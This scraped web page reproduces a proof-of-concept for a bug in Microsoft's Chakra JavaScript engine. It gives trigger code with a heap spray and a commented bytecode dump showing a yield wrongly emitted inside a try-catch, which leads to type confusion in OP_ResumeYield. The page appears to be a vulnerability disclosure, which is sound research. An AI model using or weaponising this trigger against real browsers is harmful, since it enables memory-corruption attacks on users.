扫码分享
验证:
体验盒子// PoC:
async function trigger(a = class b {
[await 1]() {
}
}) {
}
let spray = [];
for (let i = 0; i < 100000; i++) {
spray.push(parseFloat.bind(1, 0x1234, 0x1234, 0x1234, 0x1234));
}
trigger();
/*
The PoC is invalid JavaScript, but Chakra does parse it without any exception and generates incorrect bytecode from that.
Here's the generated bytecode.
Function trigger ( (#1.1), #2) (In0, In1) (size: 36 [34])
18 locals (8 temps from R10), 5 inline cache
Constant Table:
======== =====
R1 LdRoot
R2 LdC_A_I4 int:1
R3 Ld_A (undefined)
R4 LdFalse
Implicit Arg Ins:
======== === ===
R5 ArgIn_AIn1
0000 InitUndecl R6
0002 TryCatch x:004c (71)
Line 1: a = class b {
Col 24: ^
0005 BrSrNeq_Ax:0048 (62)R5R3
000a NewScFuncR13 = b()
000d InitClassR13
0012 ProfiledLdFldR14 = R13.prototype #0 <0>
0016 SetHomeObj R13R14
001b NewScObjectSimpleR9
001d ProfiledStFldR9.value = R2 #1 <1>
0021 ProfiledStFldR9.done = R4 #2 <2>
0025 YieldR9R9 <<-----------------------------------------------
0028 ResumeYieldR15R9
002b NewScFuncR16 = b.prototype[]()
002e SetComputedNameVar R16R15
0033 ProfiledLdFldR14 = R13.prototype #0 <0>
0037 InitClassMemberComputedName R14[R15] = R16
003d SetHomeObj R16R14
0042 InitConstR6R13
0045 Ld_A R5R13
0048 Leave
0049 Br x:0074 (40)
004c CatchR10
004e Nop
004f ProfiledLdRootFldR11 = root.Promise #4 <4>
0055 ProfiledLdMethodFldR12 = R11.reject #3 <3>
0059 StartCallArgCount: 2
005c ArgOut_A Out0 = R11
005f ArgOut_A Out1 = R10
0062 ProfiledCallIWithICIndex R12 = R12(ArgCount: 2) <3><0>
006c Ld_A R0R12
006f Leave
0070 Br x:0076 ( 3)
0073 Leave
0074 LdUndefR0
Line 5: }
Col1: ^
0076 Ret
Yield operations shoud not be performed under a try-catch block, but incorrectly generated bytecode allowed it at (a). This will lead to type confusion in the InterpreterStackFrame::OP_ResumeYield method.
*/
体验盒子
